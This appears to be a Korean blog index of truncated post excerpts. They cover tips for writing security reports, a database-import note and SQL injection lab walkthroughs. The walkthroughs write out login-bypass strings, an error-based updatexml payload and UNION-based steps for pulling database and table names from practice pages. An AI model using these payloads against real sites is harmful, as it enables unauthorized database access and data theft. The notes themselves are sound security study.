보고서 쓰는 법 여기에서 이걸 넣었다. 어라 되네? - > 이거 금지. 깔끔하게 해야함 기본요소 표지 이름 목차 1. 폰트 통일, 글씨 컬러 x bold. 간혹 굉장히 강조하기 위해서는 빨간 글씨 정도.페이지 번호 2. 사진의 경우 캡처 화면의 경우 너비 통일을 해야함. but 비율을 맞춰야 함 -> 너비 수치 변경 사진의 글씨 크기와 본문의 글씨크기가 비슷하도록 해야 함. 그림 테두리 + 그림 캡션(제목) 3. 풀이과정은 최대한 디테일 하게 "blien sql injection python script를 실행했다." 라는 말로 보고서에 코드 but . 공부시에는 다 쓰는게 좋음. 스샷 참조건 거짓조건 다른 화면 and ((seslect database())='dfsdfs") and ---SQL Inje..
우선 mario/mariosuper로 로그인이 정상적으로 이루어지며 reapater에서는 로그인페이지로 돌아가는것을 확인 할 수 있다. 반면 로그인 실패시 창이 넘어가지 않는것과 더불어 Warming이 나오는 것을 볼 수 있다. 1. mario'#/mariosuper입력 - > 로그인성공 mario'#/mariosuper입력 -> 로그인 실패 mario' and '1'='1/mariosuper 입력 -> 로그인 성공 select ? from ?? where ???=ID and ????=Password select ? from ?? where ???=ID 위의 sql문과 Password를 검증하는 형태로 이루어진것으로 추측 2. mario' and ('test'='test') and '1'='1/mario..
1. 웹 개발 : 웹 해킹에 있어서 필수는 아님. but. 웹개발을 안해볼 경우 한계가 있음..구조를 머릿속에 구축할 수 있는 능력. 해본 것. ---트러블 슈팅>문제의 발생 원인 찾아보기. **review-Union SQL injection> union 구문. 컬럼 개수, 타입이 같아야 함>order by를 통해 컬럼 개수 구함-Error SQL injection> 문법에러가 아닌 논리에러>updataxml 공격위치-> db질의 결과가 화면에 나오지 않는 곳-> 그외 모든곳but. 효율적이지 못함 blind sql injection : sql질의문의 참과 거짓 조건을 통해 데이터를 추출하는 기법 **원리>참 거짓의 조건에 따라 응답이 다른 곳-> 어떠하든 응답값이 하나라도 다르기만 하면 참인 조건..
우선 db는 행정안전부의 주소기반산업지원서비스 에서 받았다. db가 너무 큰 관계로 경기도 한정으로 하였다. 그런데 처음부터 파일 내용물이 이상하다. file -bi로 인코딩을 확인해보니 iso 8859-1이란다. 그래서 일단 utf-8로 charset을 바꿨다.iconv -c -t iso-8859-1 -t utf-8 원래파일명 > 변환된후 파일명다음으로 테이블을 생성하였다.CREATE TABLE `ggd_adress` ( 관리번호 VARCHAR(25) NOT NULL, 일련번호 VARCHAR(3) NOT NULL, 법정동코드 VARCHAR(10), 시도명 VARCHAR(20), 시군구명 VARCHAR(20), 법정읍면동명 VARCHAR(20), 법정리명 VARCHAR(20), 산여부 VARCHAR(1)..
1. 우선 sql injection을 확인하기 위해 id에 이상한 sql문 삽입 mario' dfdfasdf => 에러 발생 및 출력 Could not update data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'osadsdf'' at line 1 password에서는 에러가 발생하지 않음 ->select ? form ?? where ???='@@@' 2. db명 : sqli_2 mario' and updatexml(null, concat(0x3a, (select 'test')), null) and 1=..
db에서 flag 구하기. 1. 데이터 검색 가능. normaltic검색시 데이터 출력되며 일부 단어만 검색해도 데이터 출력됨. 다만 ID가 아닌 level, Rank Point, Rate는 검색 되지 않음. -> select ?? form ??? where ???? like '%normaltic%' mal%' 2. 취약점 확인. mal%' and '1%'='1 위 sql문 삽입 가능 3. 컬럼 수 : 4개 mal%' order by 4# 가능, 5 불가 4. mal%' union select '1','2','3','4'# 삽입 1,2,3,4가 순서대로 출력됨 5. db명 : sqli_1 mal%' union select database(),'2','3','4'# 6. 컬럼 명 : flag_table, ..
